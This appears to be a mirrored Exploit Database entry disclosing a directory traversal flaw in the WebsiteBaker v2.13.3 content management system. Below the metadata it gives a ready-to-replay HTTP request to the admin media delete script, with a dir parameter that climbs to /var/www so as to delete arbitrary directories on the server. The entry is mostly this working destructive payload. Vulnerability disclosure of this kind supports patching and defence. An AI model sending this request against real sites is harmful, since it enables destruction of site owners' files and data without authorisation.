WebsiteBaker v2.13.3 – Directory Traversal

• Exploit Database
• 38 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51554/

• Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
  Application: WebsiteBaker
  Version: 2.13.3
  Bugs:Directory Traversal
  Technology: PHP
  Vendor URL: https://websitebaker.org/pages/en/home.php
  Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
  Date of found: 26.06.2023
  Author: Mirabbas Ağalarov
  Tested on: Linux 
  
  
  2. Technical Details & POC
  =======================================
  
  arbitary directory deleting
  
  GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: close
  Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
  Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin